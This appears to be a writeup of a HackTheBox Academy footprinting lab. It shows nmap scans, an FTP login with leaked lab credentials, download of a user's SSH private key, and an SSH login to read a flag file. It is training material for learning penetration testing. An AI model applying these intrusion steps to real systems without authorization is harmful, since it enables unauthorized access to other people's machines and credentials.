What follows is a writeup of the lab Footprinting Easy from the HackTheBox Academy.
Given scenario.
We were commissioned by the company Inlanefreight Ltd to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture.
The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.
Additionally, our teammates have found the following credentials “ceil:qwer1234“, and they pointed out that some of the company’s employees were talking about SSH keys on a forum.
The administrators have stored a flag.txt file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.
Reconnaissance
First of all, let’s begin by probing the target machine with a Syn Scan (2-way handshake).
Limiting the number of ports to scan to the 1000 most commonly used ports is fine for this lab.
$ nmap 10.129.59.20 -Pn -sS --top-ports=1000 -n --disable-arp-ping
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 22:31 CET
Nmap scan report for 10.129.59.20
Host is up (0.059s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
2121/tcp open ccproxy-ftpNow that we have a list of open ports, it’s time to see what versions of these well-known services are running.
Even though nmap cannot output a valid version for FTP on port 21 and 2121, we can see from the appended services fingerprints that there is a ProFTPD server running.
Of particular interest is the second fingerprint which reveals the banner 220\x20ProFTPD\x20Server\x20\(Ceil's\x20FTP\)\x20.
As we can see connecting to FTP on port 2121, it exposes the home directory of the user ceil.
$ nmap 10.129.59.20 -Pn -n -sV -p21,22,53,2121
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 22:32 CET
Stats: 0:01:05 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:34 (0:00:21 remaining)
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:34 (0:00:23 remaining)
Nmap scan report for 10.129.59.20
Host is up (0.055s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
2121/tcp open ftp
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.95%I=7%D=3/27%Time=67E5C415%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,9B,"220\x20ProFTPD\x20Server\x20\(ftp\.int\.inlanefreight\.htb
SF:\)\x20\[10\.129\.59\.20\]\r\n500\x20Invalid\x20command:\x20try\x20being
SF:\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20m
SF:ore\x20creative\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2121-TCP:V=7.95%I=7%D=3/27%Time=67E5C415%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,8C,"220\x20ProFTPD\x20Server\x20\(Ceil's\x20FTP\)\x20\[10\.1
SF:29\.59\.20\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20c
SF:reative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creati
SF:ve\r\n");FTP Enumeration
Once connected we issue the command ls -la to list the content of the directory, hidden files and folders as well.
Among the hidden files and directories we should inspect .bash_history to retrieve the latest commands used while we must get a copy of the folder .ssh.
$ ftp ceil@10.129.59.20 -P2121
Connected to 10.129.59.20.
220 ProFTPD Server (Ceil's FTP) [10.129.59.20]
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||60164|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo.bash_history content:
cat id_rsa.pub >> authorized_keys
cd ..
cd /home
cd ceil/
ls -l
ls -al
mkdir flag
cd flag/
touch flag.txt
vim flag.txt
cat flag.txt
ls -al
mv flag/flag.txt .Endpoint landing
Having the SSH identity file of the user ceil we can now connect to the target machine and explore directories outside of the home directory.
Before connecting, the permissions on the id_rsa file must be changed to limit read and write permissions to the owner only, being this file a private key.
$ chmod 600 id_rsa
$ ll
total 12
-rw-r--r-- 1 count_0_interrupt count_0_interrupt 738 Nov 10 2021 authorized_keys
-rw------- 1 count_0_interrupt count_0_interrupt 3381 Nov 10 2021 id_rsa
-rw-r--r-- 1 count_0_interrupt count_0_interrupt 738 Nov 10 2021 id_rsa.pub$ ssh ceil@10.129.59.20 -i id_rsaData Exfiltration
Once inside the target machine, the flag is found inside the user flag home directory.
ceil@NIXEASY:~$ ls /home/
ceil cry0l1t3 flag
ceil@NIXEASY:/home$ cd flag/
ceil@NIXEASY:/home/flag$ ll
total 36
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ./
drwxr-xr-x 5 root root 4096 Nov 10 2021 ../
-rw------- 1 ceil ceil 42 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Feb 25 2020 .bashrc
drwx------ 2 ceil ceil 4096 Dec 15 2020 .cache/
-rw-rw-r-- 1 ceil ceil 61 Nov 10 2021 flag.txt
drwxrwxr-x 3 ceil ceil 4096 Dec 15 2020 .local/
-rw-r--r-- 1 ceil ceil 807 Feb 25 2020 .profile
-rw-r--r-- 1 ceil ceil 0 Dec 15 2020 .sudo_as_admin_successful
ceil@NIXEASY:/home/flag$ cat flag.txt
HTB{x}